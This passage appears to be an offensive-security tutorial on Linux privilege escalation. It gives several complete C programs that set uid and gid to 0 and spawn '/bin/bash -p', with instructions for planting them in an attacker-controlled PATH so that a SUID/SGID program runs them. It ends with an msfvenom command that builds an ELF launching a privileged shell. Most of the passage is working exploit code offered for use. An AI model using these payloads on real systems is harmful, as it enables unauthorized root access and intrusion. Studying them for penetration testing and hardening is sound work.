It is trivial to write a C program that spawns a shell. Two details matter: the SUID bit only gives us an effective uid of 0, so the program must copy that into the real (and saved) ids before it execs, and bash must be started with -p, otherwise it resets the effective uid to the real uid at startup.

#include <stdio.h>
#include <unistd.h>

/* When launched by a SUID-root program we arrive with euid 0; make that
 * permanent for the real and saved ids as well, then exec a shell. */
int main(void) {
	setuid(0);
	setgid(0);
	/* -p stops bash from dropping euid back to the real uid */
	execl("/bin/bash",
	      "/bin/bash",
	      "-p",
	      (char*) NULL);
	return 1;   /* only reached if execl() failed */
}

Alternative approach, using the three-id setters and system():

#define _GNU_SOURCE   /* glibc only declares setresuid/setresgid with this */
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setresuid(), setresgid() */

int main(void) {
	setresuid(0, 0, 0);
	setresgid(0, 0, 0);   /* setregid() takes two arguments, not three */
	system("/bin/bash -p");
	return 0;
}

Compile with:

gcc -fPIC -o /path/to/malicious /path/to/malicious.c

(-fPIC is harmless here but only matters for the shared-object variant; a plain gcc -o is enough for an executable.)

Note that this is almost identical to the LD_PRELOAD trick; the primary differences are:

  • Use main() instead of _init() as our entry point.
  • Compile without -shared and -nostartfiles.

A simple binary like this is useful for exploiting SUID/SGID applications that run another program by bare name rather than by absolute path, so that it is resolved through a PATH that we control: name our binary after the program the target expects, put the directory holding it first in PATH, and run the SUID/SGID application. It only works if the target really does inherit our PATH (a target that resets PATH, or is a setuid-root program under a kernel that ignores LD_* but not PATH, is a different case) and if the binary actually received euid 0, which is worth checking before assuming the shell is privileged.
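The following payload is an added example, not code from the original page: it does the same job as the two programs above but checks, before and after, whether the SUID bit really handed us euid 0, so a misplaced binary fails loudly instead of silently dropping an unprivileged shell. It assumes a Linux/glibc target with bash at /bin/bash; the id-dump lines on stderr and the function names elevate() and fully_root() are this example's own.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Dump real and effective ids so the reader can see what the SUID/SGID
 * bits actually gave us (output goes to stderr, which is rarely captured
 * by the calling program). */
static void print_ids(const char *label) {
    fprintf(stderr, "[%s] uid=%u euid=%u gid=%u egid=%u\n", label,
            (unsigned)getuid(), (unsigned)geteuid(),
            (unsigned)getgid(), (unsigned)getegid());
}

/* 1 iff real and effective uid and gid are all 0. */
static int fully_root(void) {
    return getuid() == 0 && geteuid() == 0 &&
           getgid() == 0 && getegid() == 0;
}

/* Turn an effective uid of 0 into full root in every id slot.
 * Returns 0 on success, -1 (errno set) if the kernel refused. With euid 0
 * the process has CAP_SETUID/CAP_SETGID, so setuid(0)/setgid(0) set the
 * real, effective and saved ids at once. Without it (we were not started
 * by a SUID-root program) the calls fail with EPERM, which is exactly the
 * failure mode we want to detect rather than paper over. gid first: once
 * setuid(0) has run, the order no longer matters, but doing it this way
 * keeps the sequence correct if the pattern is ever reused for dropping
 * privileges. */
static int elevate(void) {
    if (setgid(0) != 0)
        return -1;
    if (setuid(0) != 0)
        return -1;
    return 0;
}

int main(void) {
    print_ids("before");

    if (elevate() != 0) {
        fprintf(stderr, "elevate failed: %s (euid=%u); "
                        "not spawning a shell\n",
                strerror(errno), (unsigned)geteuid());
        return 1;
    }

    print_ids("after");

    /* -p keeps bash from resetting euid to the real uid; after setuid(0)
     * they are equal anyway, but it costs nothing and covers the case
     * where only the effective id made it to 0. */
    execl("/bin/bash", "/bin/bash", "-p", (char *)NULL);
    perror("execl");
    return 1;
}
```

Compile it the same way as the programs above (gcc -o, no -shared), drop it into the PATH directory under the name the target looks up, and watch the two id lines: if "after" does not show uid=0 the target never gave us euid 0 and the PATH hijack did not fire.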

Using Metasploit

How to use msfvenom to generate a binary that launches any command as root

Metasploit's msfvenom tool can generate an ELF that runs an arbitrary command, which serves the same purpose against SUID/SGID applications that resolve other executables through a PATH we control. Note that linux/x86/exec does not call setuid(0) on its own: the command runs with whatever real and effective ids the SUID program passed down, so keep -p on the bash invocation (the Linux payloads also accept PrependSetuid=true to set the real uid to 0 first). Use linux/x64/exec for 64-bit targets, and remember to chmod +x the output before placing it in the PATH directory.

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf \
         -o shell.elf